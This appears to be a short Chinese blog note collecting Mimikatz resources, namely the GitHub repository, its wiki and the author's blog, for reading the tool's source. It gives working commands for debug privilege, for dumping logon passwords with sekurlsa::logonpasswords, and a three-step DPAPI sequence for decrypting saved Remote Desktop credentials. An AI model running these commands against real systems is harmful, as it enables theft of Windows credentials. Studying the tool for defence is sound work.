【源码阅读】Mimikatz相关资料
源码 相关 阅读 资料
2023-09-14 08:57:09 时间
-
Mimikatz GitHub (源码)
https://github.com/gentilkiwi/mimikatz -
Mimikatz GitHub Wiki (包含了一些说明文档)
https://github.com/gentilkiwi/mimikatz/wiki -
GentilKiwi Blog (博客里的大多数内容是用法语写的,请使用 Chrome 浏览器进行自动翻译)
http://blog.gentilkiwi.com/mimikatz -
感兴趣的两个点
-
- 提权
mimikatz privilege::debug
- 提权
-
- 获取密码原理
mimikatz sekurlsa::logonpasswords
- 获取密码原理
-
- 获取远程终端会话存储密码
// 1、获取指定用户下的远程会话凭据
mimikatz "dpapi::cred /in:C:\Users\xx\AppData\Local\Microsoft\Credentials\FF359429D6F19C64BA7D3E282558EEB5"
// 2、根据GUID获取对应的masterkey
mimikatz sekurlsa::dpapi
// 3、注入 masterkey解密
mimikatz "dpapi::cred /in:C:\Users\xx\AppData\Local\Microsoft\Credentials\FF359429D6F19C64BA7D3E282558EEB5 /masterkey:28d1f3252c019f9cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx16dcec8e5dbf5cd0"
- 获取远程终端会话存储密码
-
参考
Password Storage Locations For Popular Windows Applications
http://www.nirsoft.net/articles/saved_password_location.html
【奇技淫巧】破解远程终端凭据,获取服务器密码
相关文章
- jenkins添加git源码目录时报Error performing command错误
- 将酷狗krc歌词解析并转换为lrc歌词php源码
- mybatis简单案例源码详细【注释全面】——实体层(User.java)
- 【云栖大会】阿里云开放AliSQL数据库源码下载
- 【第五篇】Volley代码修改之图片二级缓存以及相关源码阅读(重写ImageLoader.ImageCache)
- Spring读源码系列番外篇---06----类型转换---下---ConversionService相关家族
- ZZNUOJ_用C语言编写程序实现1174:矩阵转置(指针专题)(附完整源码)
- Android 11.0 12.0无源码apk设置默认启动Launcher的相关属性
- 计算机毕设 SSM Vue的企业销售人才培训管理系统(含源码+论文)
- 毕业设计 Spring Boot的网上租车管理系统(含源码+论文)
- 【Linux 内核】进程管理 ( 进程相关系统调用源码分析 | fork() 源码 | vfork() 源码 | clone() 源码 | _do_fork() 源码 | do_fork() 源码 )
- AI模型设计:配置C++版本pytorch(libtorch 1.12)开发环境以及demo源码的实现
- 第二人生的源码分析(五十七)OpenGL离屏渲染的相关函数
- 3D点云重建0-09:MVSNet-源码解析(5)-Cost Volume Regularization,soft_arg_min
- Android 10.0 系统systemui下拉通知栏的通知布局相关源码分析